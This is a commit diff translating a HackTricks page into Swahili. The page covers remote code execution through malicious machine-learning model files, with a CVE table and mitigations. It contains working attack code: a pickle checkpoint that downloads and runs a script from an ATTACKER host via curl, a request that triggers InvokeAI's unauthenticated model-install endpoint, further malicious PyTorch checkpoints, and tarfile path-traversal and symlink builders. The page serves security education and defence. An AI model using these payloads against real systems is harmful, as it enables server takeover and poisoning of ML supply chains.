maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['', 'src/AI/AI-Models-RCE.md'] to sw

Browse Source
This commit is contained in:
Translator 2025-10-01 02:50:27 +00:00
parent 444db906fe
commit 120eed7e4c
1 changed files with 95 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

138
src/AI/AI-Models-RCE.md
View File

@ -1,45 +1,46 @@
# Models RCE
# RCE za Modeli
{{#include ../banners/hacktricks-training.md}}
## Loading models to RCE
## Kupakia modeli kwa RCE
Modeli za Machine Learning kawaida hushirikiwa katika mifumo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Hizi modeli zinaweza kupakuliwa kwenye mashine za waendelezaji au mifumo ya uzalishaji ili kuzitumia. Kawaida, modeli hazipaswi kuwa na msimbo mbaya, lakini kuna baadhi ya kesi ambapo modeli inaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia modeli.
Modeli za Machine Learning kwa kawaida zinashirikiwa katika muundo tofauti, kama ONNX, TensorFlow, PyTorch, n.k. Modeli hizi zinaweza kupakiwa kwenye mashine za watengenezaji au mifumo ya uzalishaji ili kuzitumia. Kawaida modeli hazipaswi kuwa na code hasidi, lakini kuna baadhi ya kesi ambapo modeli inaweza kutumiwa kutekeleza code yoyote kwenye mfumo kama kipengele kilichokusudiwa au kwa sababu ya udhaifu katika maktaba ya kupakia modeli.
Wakati wa kuandika, haya ni baadhi ya mifano ya aina hii ya udhaifu:
Wakati wa kuandika, hizi ni mifano ya aina hizi za udhaifu:
| **Framework / Tool** | **Vulnerability (CVE if available)** | **RCE Vector** | **References** |
| **Mfumo / Zana** | **Udhaifu (CVE endapo inapatikana)** | **Vector ya RCE** | **Marejeo** |
|-----------------------------|------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------|
| **PyTorch** (Python) | *Insecure deserialization in* `torch.load` **(CVE-2025-32434)** | Malicious pickle in model checkpoint leads to code execution (bypassing `weights_only` safeguard) | |
| PyTorch **TorchServe** | *ShellTorch* **CVE-2023-43654**, **CVE-2022-1471** | SSRF + malicious model download causes code execution; Java deserialization RCE in management API | |
| **TensorFlow/Keras** | **CVE-2021-37678** (unsafe YAML) <br> **CVE-2024-3660** (Keras Lambda) | Loading model from YAML uses `yaml.unsafe_load` (code exec) <br> Loading model with **Lambda** layer runs arbitrary Python code | |
| TensorFlow (TFLite) | **CVE-2022-23559** (TFLite parsing) | Crafted `.tflite` model triggers integer overflow → heap corruption (potential RCE) | |
| **Scikit-learn** (Python) | **CVE-2020-13092** (joblib/pickle) | Loading a model via `joblib.load` executes pickle with attackers `__reduce__` payload | |
| **NumPy** (Python) | **CVE-2019-6446** (unsafe `np.load`) *disputed* | `numpy.load` default allowed pickled object arrays malicious `.npy/.npz` triggers code exec | |
| **PyTorch** (Python) | *Insecure deserialization in* `torch.load` **(CVE-2025-32434)** | pickle hasidi katika model checkpoint husababisha utekelezaji wa code (kupita `weights_only` safeguard) | |
| PyTorch **TorchServe** | *ShellTorch* **CVE-2023-43654**, **CVE-2022-1471** | SSRF + malicious model download causes code execution; Java deserialization RCE katika management API | |
| **NVIDIA Merlin Transformers4Rec** | Unsafe checkpoint deserialization via `torch.load` **(CVE-2025-23298)** | Untrusted checkpoint triggers pickle reducer during `load_model_trainer_states_from_checkpoint` → utekelezaji wa code katika ML worker | [ZDI-25-833](https://www.zerodayinitiative.com/advisories/ZDI-25-833/) |
| **TensorFlow/Keras** | **CVE-2021-37678** (unsafe YAML) <br> **CVE-2024-3660** (Keras Lambda) | Kupakia modeli kutoka YAML kunatumia `yaml.unsafe_load` (code exec) <br> Kupakia modeli yenye **Lambda** layer hufanya utekelezaji wa Python code yoyote | |
| TensorFlow (TFLite) | **CVE-2022-23559** (TFLite parsing) | Modeli `.tflite` iliyotengenezwa husababisha integer overflow → heap corruption (inawezekana RCE) | |
| **Scikit-learn** (Python) | **CVE-2020-13092** (joblib/pickle) | Kupakia modeli kupitia `joblib.load` huitisha pickle na payload ya mshambuliaji `__reduce__` | |
| **NumPy** (Python) | **CVE-2019-6446** (unsafe `np.load`) *disputed* | chaguo-msingi cha `numpy.load` kinaruhusu pickled object arrays `.npy/.npz` hasidi husababisha code exec | |
| **ONNX / ONNX Runtime** | **CVE-2022-25882** (dir traversal) <br> **CVE-2024-5187** (tar traversal) | ONNX models external-weights path can escape directory (read arbitrary files) <br> Malicious ONNX model tar can overwrite arbitrary files (leading to RCE) | |
| ONNX Runtime (design risk) | *(No CVE)* ONNX custom ops / control flow | Model with custom operator requires loading attackers native code; complex model graphs abuse logic to execute unintended computations | |
| **NVIDIA Triton Server** | **CVE-2023-31036** (path traversal) | Using model-load API with `--model-control` enabled allows relative path traversal to write files (e.g., overwrite `.bashrc` for RCE) | |
| **GGML (GGUF format)** | **CVE-2024-25664 … 25668** (multiple heap overflows) | Malformed GGUF model file causes heap buffer overflows in parser, enabling arbitrary code execution on victim system | |
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Malicious HDF5 (`.h5`) model with Lambda layer code still executes on load (Keras safe_mode doesnt cover old format “downgrade attack”) | |
| **Others** (general) | *Design flaw* Pickle serialization | Many ML tools (e.g., pickle-based model formats, Python `pickle.load`) will execute arbitrary code embedded in model files unless mitigated | |
| **NVIDIA Triton Server** | **CVE-2023-31036** (path traversal) | Kutumia model-load API na `--model-control` imewezeshwa kuruhusu relative path traversal kuandika faili (mfano: kuandika juu ya `.bashrc` kwa RCE) | |
| **GGML (GGUF format)** | **CVE-2024-25664 … 25668** (multiple heap overflows) | Faili ya modeli ya GGUF iliyoharibika husababisha heap buffer overflows kwenye parser, ikiruhusu utekelezaji wa code yoyote kwenye mfumo wa mwathirika | |
| **Keras (older formats)** | *(No new CVE)* Legacy Keras H5 model | Modeli HDF5 (`.h5`) hasidi yenye Lambda layer bado hufanya utekelezaji wa code wakati wa load (Keras safe_mode haijumuishi format za zamani “downgrade attack”) | |
| **Others** (general) | *Design flaw* Pickle serialization | Zana nyingi za ML (mf., pickle-based model formats, Python `pickle.load`) zitaweka utekelezaji wa code yoyote uliowekwa katika faili za modeli isipokuwa zikadhibitiwe | |
Zaidi ya hayo, kuna baadhi ya modeli zinazotegemea python pickle kama zile zinazotumiwa na [PyTorch](https://github.com/pytorch/pytorch/security) ambazo zinaweza kutumika kutekeleza msimbo wa kiholela kwenye mfumo ikiwa hazijapakiwa na `weights_only=True`. Hivyo, modeli yoyote inayotegemea pickle inaweza kuwa na hatari maalum kwa aina hii ya mashambulizi, hata kama hazijatajwa kwenye jedwali hapo juu.
Zaidi ya hayo, kuna baadhi ya modeli zinazotegemea python pickle kama zile zinazotumika na [PyTorch](https://github.com/pytorch/pytorch/security) ambazo zinaweza kutumiwa kutekeleza code yoyote kwenye mfumo ikiwa hazitapakuliwa kwa `weights_only=True`. Kwa hivyo, modeli yoyote inayotegemea pickle inaweza kuwa nyeti hasa kwa aina hii ya mashambulizi, hata kama hazijaorodheshwa katika jedwali hapo juu.
### 🆕 InvokeAI RCE via `torch.load` (CVE-2024-12029)
`InvokeAI` ni kiolesura maarufu cha wavuti cha chanzo wazi kwa Stable-Diffusion. Matoleo **5.3.1 5.4.2** yanaonyesha mwisho wa REST `/api/v2/models/install` ambao unaruhusu watumiaji kupakua na kupakia modeli kutoka URL za kiholela.
`InvokeAI` ni interface maarufu ya open-source ya wavuti kwa Stable-Diffusion. Matoleo **5.3.1 5.4.2** yanaonyesha endpoint ya REST `/api/v2/models/install` inayomruhusu mtumiaji kupakua na kupakia modeli kutoka kwenye URL yoyote.
Ndani, mwisho huu hatimaye unaita:
Kimsingi endpoint hatimaye inaita:
```python
checkpoint = torch.load(path, map_location=torch.device("meta"))
```
Wakati faili iliyotolewa ni **PyTorch checkpoint (`*.ckpt`)**, `torch.load` inafanya **pickle deserialization**. Kwa sababu maudhui yanatoka moja kwa moja kwenye URL inayodhibitiwa na mtumiaji, mshambuliaji anaweza kuingiza kitu kibaya chenye njia ya `__reduce__` iliyobinafsishwa ndani ya checkpoint; njia hiyo inatekelezwa **wakati wa deserialization**, ikisababisha **remote code execution (RCE)** kwenye seva ya InvokeAI.
Wakati faili iliyotolewa ni **PyTorch checkpoint (`*.ckpt`)**, `torch.load` hufanya **pickle deserialization**. Kwa sababu maudhui yanatoka moja kwa moja kutoka kwenye URL inayodhibitiwa na mtumiaji, mshambuliaji anaweza kuingiza kitu chenye madhara chenye method maalum `__reduce__` ndani ya checkpoint; method hiyo inatekelezwa **wakati wa deserialization**, ikisababisha **remote code execution (RCE)** kwenye InvokeAI server.
Uthibitisho wa udhaifu ulipatiwa **CVE-2024-12029** (CVSS 9.8, EPSS 61.17 %).
Udhaifu ulipewa **CVE-2024-12029** (CVSS 9.8, EPSS 61.17 %).
#### Mwongozo wa unyakuzi
#### Exploitation walk-through
1. Tengeneza checkpoint mbaya:
1. Tengeneza checkpoint yenye madhara:
```python
# payload_gen.py
import pickle, torch, os
@ -51,8 +52,8 @@ return (os.system, ("/bin/bash -c 'curl http://ATTACKER/pwn.sh|bash'",))
with open("payload.ckpt", "wb") as f:
pickle.dump(Payload(), f)
```
2. Kuweka `payload.ckpt` kwenye seva ya HTTP unayodhibiti (mfano `http://ATTACKER/payload.ckpt`).
3. Chochea kiunganishi kilichohatarishwa (hakuna uthibitisho unaohitajika):
2. Endesha `payload.ckpt` kwenye HTTP server unayoidhibiti (kwa mfano `http://ATTACKER/payload.ckpt`).
3. Chochea endpoint iliyo dhaifu (no authentication required):
```python
import requests
@ -67,36 +68,79 @@ json={}, # body can be empty
timeout=5,
)
```
4. Wakati InvokeAI inaposhusha faili inaita `torch.load()` → gadget ya `os.system` inakimbia na mshambuliaji anapata utekelezaji wa msimbo katika muktadha wa mchakato wa InvokeAI.
4. Wakati InvokeAI inapopakua faili inaita `torch.load()` → gadget ya `os.system` inaendeshwa na mshambuliaji anapata utekelezaji wa msimbo katika muktadha wa mchakato wa InvokeAI.
Ready-made exploit: **Metasploit** module `exploit/linux/http/invokeai_rce_cve_2024_12029` inafanya mchakato mzima kuwa wa kiotomatiki.
Exploit tayari: moduli ya **Metasploit** `exploit/linux/http/invokeai_rce_cve_2024_12029` inaoautomatisha mchakato mzima.
#### Masharti
• InvokeAI 5.3.1-5.4.2 (bendera ya skana ya kawaida **false**)
`/api/v2/models/install` inapatikana na mshambuliaji
• InvokeAI 5.3.1-5.4.2 (scan flag default **false**)
`/api/v2/models/install` inafikika kwa mshambuliaji
• Mchakato una ruhusa za kutekeleza amri za shell
#### Mipango ya Kuzuia
#### Kupunguza Hatari
* Pandisha hadi **InvokeAI ≥ 5.4.3** patch inafanya `scan=True` kuwa ya kawaida na inafanya uchunguzi wa malware kabla ya deserialization.
* Wakati wa kupakia checkpoints kwa njia ya programu tumia `torch.load(file, weights_only=True)` au [`torch.load_safe`](https://pytorch.org/docs/stable/serialization.html#security) msaidizi mpya.
* Lazimisha orodha za ruhusa / saini za vyanzo vya modeli na uendeshe huduma kwa kiwango cha chini cha ruhusa.
* Sasisha hadi **InvokeAI ≥ 5.4.3** patch inaweka `scan=True` kwa chaguo-msingi na inafanya skanning ya malware kabla ya deserialization.
* Unapopakua checkpoints programmatically tumia `torch.load(file, weights_only=True)` au helper mpya [`torch.load_safe`](https://pytorch.org/docs/stable/serialization.html#security).
* Tekeleza allow-lists / signatures kwa vyanzo vya modeli na endesha huduma kwa least-privilege.
> ⚠️ Kumbuka kwamba **aina yoyote** ya muundo wa Python pickle (ikiwemo faili nyingi za `.pt`, `.pkl`, `.ckpt`, `.pth`) kwa asili si salama kutekeleza kutoka vyanzo visivyoaminika.
> ⚠️ Kumbuka kwamba **kila** muundo wa Python unaotegemea pickle (ikiwa ni pamoja na mafaili mengi `.pt`, `.pkl`, `.ckpt`, `.pth`) ni hatari kwa asili kufanyiwa deserialization kutoka kwa vyanzo visivyoaminika.
---
Mfano wa mipango ya kuzuia ya ad-hoc ikiwa lazima uendelee kutumia toleo la zamani la InvokeAI nyuma ya proxy ya kurudi:
Mfano wa kupunguza hatari wa ad-hoc ikiwa lazima uendeleze matoleo ya zamani ya InvokeAI yanayofanya kazi nyuma ya reverse proxy:
```nginx
location /api/v2/models/install {
deny all; # block direct Internet access
allow 10.0.0.0/8; # only internal CI network can call it
}
```
## Mfano kuunda mfano mbaya wa PyTorch
### 🆕 NVIDIA Merlin Transformers4Rec RCE kupitia isiyo salama `torch.load` (CVE-2025-23298)
- Unda mfano:
Transformers4Rec ya NVIDIA (sehemu ya Merlin) ilifunua loader hatari ya checkpoint ambayo iliita moja kwa moja `torch.load()` kwa paths zilizotolewa na mtumiaji. Kwa sababu `torch.load` inategemea Python `pickle`, checkpoint inayodhibitiwa na mshambulizi inaweza kutekeleza msimbo wowote kupitia reducer wakati wa deserialization.
Njia iliyo na udhaifu (pre-fix): `transformers4rec/torch/trainer/trainer.py``load_model_trainer_states_from_checkpoint(...)``torch.load(...)`.
Kwa nini hili linapelekea RCE: Katika Python pickle, kitu kinaweza kutaja reducer (`__reduce__`/`__setstate__`) kinachorejesha callable na vigezo. Callable hiyo inatekelezwa wakati wa unpickling. Ikiwa kitu kama hicho kipo katika checkpoint, kinaendeshwa kabla uzito wowote kutumiwa.
Mfano mdogo wa checkpoint hasidi:
```python
import torch
class Evil:
def __reduce__(self):
import os
return (os.system, ("id > /tmp/pwned",))
# Place the object under a key guaranteed to be deserialized early
ckpt = {
"model_state_dict": Evil(),
"trainer_state": {"epoch": 10},
}
torch.save(ckpt, "malicious.ckpt")
```
Njia za utoaji na eneo la athari:
- Trojanized checkpoints/models zilizoshirikiwa kupitia repos, buckets, au artifact registries
- Automated resume/deploy pipelines zinazojipakia checkpoints moja kwa moja
- Uendeshaji hufanyika ndani ya training/inference workers, mara nyingi kwa vibali vya juu (mfano, root katika containers)
Suluhisho: Commit [b7eaea5](https://github.com/NVIDIA-Merlin/Transformers4Rec/pull/802/commits/b7eaea527d6ef46024f0a5086bce4670cc140903) (PR #802) ilibadilisha `torch.load()` ya moja kwa moja kwa deserializer iliyozuiliwa na iliyowekwa kwenye allow-list iliyotekelezwa katika `transformers4rec/utils/serialization.py`. Loader mpya inathibitisha types/fields na inazuia arbitrary callables kutiwa ndani wakati wa load.
Mwongozo wa kinga maalum kwa PyTorch checkpoints:
- Usifanye unpickle data isiyoaminika. Tumia zaidi fomati zisizotekelezwa kama [Safetensors](https://huggingface.co/docs/safetensors/index) au ONNX inapowezekana.
- Ikiwa lazima utumie PyTorch serialization, hakikisha `weights_only=True` (inayoungwa mkono katika PyTorch mpya) au tumia custom allow-listed unpickler sawa na patch ya Transformers4Rec.
- Lazimishe model provenance/signatures na sandbox deserialization (seccomp/AppArmor; non-root user; restricted FS na hakuna network egress).
- Angalia kwa ajili ya unexpected child processes kutoka huduma za ML wakati wa checkpoint load; fuatilia matumizi ya `torch.load()`/`pickle`.
POC na marejeo ya vulnerable/patch:
- Vulnerable pre-patch loader: https://gist.github.com/zdi-team/56ad05e8a153c84eb3d742e74400fd10.js
- Malicious checkpoint POC: https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js
- Post-patch loader: https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js
## Mfano kuunda model hatari ya PyTorch
- Tengeneza model:
```python
# attacker_payload.py
import torch
@ -113,7 +157,7 @@ malicious_state = {"fc.weight": MaliciousPayload()}
# Save the malicious state dict
torch.save(malicious_state, "malicious_state.pth")
```
- Pakia mfano:
- Pakia modeli:
```python
# victim_load.py
import torch
@ -133,9 +177,9 @@ model.load_state_dict(torch.load("malicious_state.pth", weights_only=False))
```
## Models to Path Traversal
Kama ilivyoelezwa katika [**hiki blogu**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), mifano mingi inayotumika na mifumo tofauti ya AI inategemea archives, mara nyingi `.zip`. Hivyo, inaweza kuwa inawezekana kutumia mifano hii kufanya mashambulizi ya path traversal, kuruhusu kusoma faili za kawaida kutoka kwenye mfumo ambapo mfano umewekwa.
Kama ilivyotajwa katika [**this blog post**](https://blog.huntr.com/pivoting-archive-slip-bugs-into-high-value-ai/ml-bounties), muundo wa wengi wa models zinazotumiwa na frameworks mbalimbali za AI unategemea archives, kawaida `.zip`. Kwa hivyo, huenda iwezekane kuabuse format hizi ili kufanya path traversal attacks, na kuruhusu kusoma mafaili yoyote kutoka kwa mfumo ambapo model imepakuliwa.
Kwa mfano, kwa kutumia msimbo ufuatao unaweza kuunda mfano ambao utaunda faili katika saraka ya `/tmp` wakati unapo load:
Kwa mfano, kwa code ifuatayo unaweza kuunda model itakayounda faili katika directory ya `/tmp` wakati inapopakuliwa:
```python
import tarfile
@ -146,7 +190,7 @@ return member
with tarfile.open("traversal_demo.model", "w:gz") as tf:
tf.add("harmless.txt", filter=escape)
```
Au, kwa kutumia msimbo ufuatao unaweza kuunda mfano ambao utaunda symlink kwa saraka ya `/tmp` wakati inapo load:
Au, kwa kutumia msimbo ufuatao unaweza kuunda model ambayo itaunda symlink kwa saraka ya `/tmp` wakati inapoanzishwa:
```python
import tarfile, pathlib
@ -161,19 +205,27 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
tf.add(pathlib.Path(PAYLOAD).parent, filter=link_it)
tf.add(PAYLOAD) # rides the symlink
```
### Deep-dive: Keras .keras deserialization and gadget hunting
### Uchunguzi wa kina: Keras .keras deserialization and gadget hunting
Kwa mwongozo uliolengwa kuhusu ndani za .keras, Lambda-layer RCE, the arbitrary import issue in ≤ 3.8, na post-fix gadget discovery ndani ya allowlist, angalia:
Kwa mwongozo wa kina kuhusu .keras ndani, Lambda-layer RCE, suala la kuagiza bila mpangilio katika ≤ 3.8, na ugunduzi wa gadget baada ya kurekebisha ndani ya orodha ya ruhusa, angalia:
{{#ref}}
../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
{{#endref}}
## References
## Marejeo
- [OffSec blog "CVE-2024-12029 InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
- [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
- [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
- [PyTorch security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
- [ZDI blog CVE-2025-23298 Getting Remote Code Execution in NVIDIA Merlin](https://www.thezdi.com/blog/2025/9/23/cve-2025-23298-getting-remote-code-execution-in-nvidia-merlin)
- [ZDI advisory: ZDI-25-833](https://www.zerodayinitiative.com/advisories/ZDI-25-833/)
- [Transformers4Rec patch commit b7eaea5 (PR #802)](https://github.com/NVIDIA-Merlin/Transformers4Rec/pull/802/commits/b7eaea527d6ef46024f0a5086bce4670cc140903)
- [Pre-patch vulnerable loader (gist)](https://gist.github.com/zdi-team/56ad05e8a153c84eb3d742e74400fd10.js)
- [Malicious checkpoint PoC (gist)](https://gist.github.com/zdi-team/fde7771bb93ffdab43f15b1ebb85e84f.js)
- [Post-patch loader (gist)](https://gist.github.com/zdi-team/a0648812c52ab43a3ce1b3a090a0b091.js)
- [Hugging Face Transformers](https://github.com/huggingface/transformers)
{{#include ../banners/hacktricks-training.md}}